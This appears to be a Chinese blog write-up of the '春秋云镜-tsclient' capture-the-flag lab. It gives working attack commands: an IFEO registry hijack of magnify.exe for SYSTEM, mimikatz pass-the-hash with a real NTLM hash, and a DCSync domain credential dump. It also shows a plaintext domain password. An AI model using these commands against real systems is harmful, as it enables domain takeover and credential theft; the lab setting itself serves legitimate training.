春秋云镜-tsclient
春秋云镜-tsclient
flag01
扫到了mssql的弱口令
MDUT进行连接
然后sweetpotato提权system
然后新建一个administrator权限
进行rdp登录
flag02
上线cs进行方便更好的信息搜集
fscan在扫一遍
1  | (icmp) Target 172.22.8.31 is alive  | 
这是存活的几台机子
1  | 发现了一个在线的john  | 
发现了一个文件,保存的为账密
1  | xiaorang.lab\Aldrich:Ald@rLMWuy7Z!  | 
通过smbpasswd修改密码
然后再rdp进行登录
然后再利用该上线的机器进行创建listener
然后上线cs
下一步就是映像劫持提权,先查看权限:
1  | get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *  | 
这里我们发现所有正常登录的用户都可以修改注册表,利用这个性质,修改注册表映像劫持,使用放大镜进行提权,其实也就是把本来用户主页点放大镜启动的magnify.exe替换成C:\windows\system32\cmd.exe,这样就直接提权成system了
1  | REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"  | 
然后上线sys的权限
1  | flag{e0bf7bf1-6d34-4008-a378-f0abe82a63f7}  | 
flag03
1  | logonpasswords  | 
发现win2016$在域管组里
1  | shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:9ae97aee37028978510c41bb018710ba" "exit"  | 
1  | shell C:\\Users\\Aldrich\\Desktop\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"  | 
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 CQJKL!
 评论
